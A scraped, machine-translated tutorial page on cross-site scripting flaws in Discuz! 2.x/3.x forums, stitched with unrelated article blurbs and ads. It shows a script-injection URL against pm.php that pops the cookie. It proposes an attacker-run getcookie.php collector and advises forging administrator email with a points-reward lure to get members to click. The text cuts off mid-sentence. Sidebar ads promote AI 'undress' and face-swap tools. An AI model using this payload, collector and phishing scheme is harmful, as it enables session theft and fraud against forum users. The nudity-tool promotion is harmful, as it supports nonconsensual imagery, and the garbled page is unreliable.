Discuz! Cross-site encyclopedia_PHP tutorial
In discuz! The subjects in posts, replies, PMs, etc. are not filtered, so you can also add codes. AI-powered app for creating realistic nude photos Online AI tool for removing clothes from photos. Undress images for free AI clothes remover Swap faces in any video effortlessly with our completely free AI face swap tool! Easy-to-use and free code editor Chinese version, very easy to use Powerful PHP integrated development environment Visual web development tools God-level code editing software (SublimeText3)
For example
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22
The effect is to pop up your own cookie first
Usage method: put the above The code is placed in img.
Applicable version: discuz! 2.x
discuz! 3.x
A way to exploit discuz! 2.0 vulnerability attempts to deceive and obtain cookies
There is a security vulnerability in testing the PM function of the XXXFan forum. The specific description is as follows:
XXXFan sends a quiet link to a member as follows (assuming that the member’s name is XXXFan)
http://XXX/pm.php?action=send&username=XXXFan
Because the forum program does not filter member names, but displays them directly in the send column (TO:), so you can add after the name Upload the script code. For example
http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script>
Of course we can first construct a program on our own site to collect cookies, similar to
getcookie.php?cookie=
But how to induce members to click? If it is simply placed on the forum, Too easy to identify. Therefore, you can use another function of the discuz forum program, the "post to friends" function.
Because this function of discuz does not perform any filtering, identification or template on the filled in emial address, you can fake anyone to send letters to others, and the security is very high. Using this function, we can forge the administrator of ExploitFan to send a letter to a member to induce the member to click on the URL we prepared. If you induce the member, it depends on your own method. For example, you can say "The forum is testing new features, please Please help click on the above address, and we will record your click in the background and add points to you as a reward at the appropriate time, etc.
Because the link address is XXXFan’s, and the sender and email address are both XXXFan’s official addresses, the credibility is very high and no clues will be left. Of course, for higher security, the content in
Hot AI Tools
Undresser.AI Undress
AI Clothes Remover
Undress AI Tool
Clothoff.io
Video Face Swap
Hot Article
Hot Tools
Notepad++7.3.1
SublimeText3 Chinese version
Zend Studio 13.0.1
Dreamweaver CS6
SublimeText3 Mac version
Hot Topics
1387
52
Discuz background login problem solution revealed
Mar 03, 2024 am 08:57 AM
The solution to the Discuz background login problem is revealed. Specific code examples are needed. With the rapid development of the Internet, website construction has become more and more common, and Discuz, as a commonly used forum website building system, has been favored by many webmasters. However, precisely because of its powerful functions, sometimes we encounter some problems when using Discuz, such as background login problems. Today, we will reveal the solution to the Discuz background login problem and provide specific code examples. We hope to help those in need.
Detailed explanation of Discuz registration process: allowing you to easily modify personal information
Mar 13, 2024 pm 12:21 PM
"Detailed Explanation of Discuz Registration Process: Allowing you to easily modify personal information, specific code examples are required" Discuz is a powerful community forum program that is widely used in various websites. It provides a wealth of user registration and personal information modification. functions and interfaces. This article will introduce you to Discuz's registration process in detail and provide specific code examples to help you easily customize and modify your personal information. 1. User registration process In Discuz, user registration is one of the important functions of the site. The smoothness of the registration process and
What is Discuz? Definition and function introduction of Discuz
Mar 03, 2024 am 10:33 AM
"Exploring Discuz: Definition, Functions and Code Examples" With the rapid development of the Internet, community forums have become an important platform for people to obtain information and exchange opinions. Among the many community forum systems, Discuz, as a well-known open source forum software in China, is favored by the majority of website developers and administrators. So, what is Discuz? What functions does it have, and how can it help our website? This article will introduce Discuz in detail and attach specific code examples to help readers learn more about it.
A must-have for Discuz users! Comprehensive analysis of renaming props!
Mar 12, 2024 pm 10:15 PM
A must-have for Discuz users! Comprehensive analysis of renaming props! In the Discuz forum, the name change function has always received much attention and demand from users. For some users who need to change their name, name change props can easily modify the user name, and this is also an interesting way of interaction. Let’s take an in-depth look at the renaming props in Discuz, including how to obtain them, how to use them, and solutions to some common problems. 1. Obtain name-changing props in Discuz. Name-changing props are usually purchased through points or the administrator
What should I do if I encounter an incorrect Discuz password? Quick solution sharing!
Mar 03, 2024 am 09:33 AM
What should I do if I encounter an incorrect Discuz password? Quick solution sharing! Discuz! It is a very popular forum program that provides users with a platform for convenient communication. Using Discuz! When accessing a forum, sometimes you may encounter an incorrect password, which may cause users to be unable to log in and use the forum normally. Well, meet Discuz! When the password is wrong, how should we quickly solve the problem? Some solutions will be shared below, with specific code examples provided for reference. 1. Check whether the password
Solve the problem that Discuz WeChat sharing cannot be displayed
Mar 09, 2024 pm 03:39 PM
Title: To solve the problem that Discuz WeChat shares cannot be displayed, specific code examples are needed. With the development of the mobile Internet, WeChat has become an indispensable part of people's daily lives. In website development, in order to improve user experience and expand website exposure, many websites will integrate WeChat sharing functions, allowing users to easily share website content to Moments or WeChat groups. However, sometimes when using open source forum systems such as Discuz, you will encounter the problem that WeChat shares cannot be displayed, which brings certain difficulties to the user experience.
Discuz Editor: Powerful web page editing tool
Mar 09, 2024 pm 06:06 PM
Discuz Editor: A powerful web page editing tool that requires specific code examples. With the development of the Internet, website construction and content editing have become more and more important. As a common web page editing tool, Discuz editor plays an important role in website construction. It not only provides a wealth of functions and tools, but also helps users edit and publish content more conveniently. In this article, we will introduce the features and usage of the Discuz editor, and provide some specific code examples to help readers better understand and use
Discuz background account login exception, how to deal with it?
Mar 09, 2024 pm 05:51 PM
Title: Discuz background account login exception, how to deal with it? When you use the backend management of the Discuz forum system, you may sometimes encounter abnormal account login. This could be due to a variety of reasons, including a wrong password, account being blocked, network connection issues, etc. When encountering this situation, we need to solve the problem through simple troubleshooting and processing. Check whether the account number and password are correct: First, confirm whether the account number and password you entered are correct. When logging in, make sure the capitalization is correct and the password is
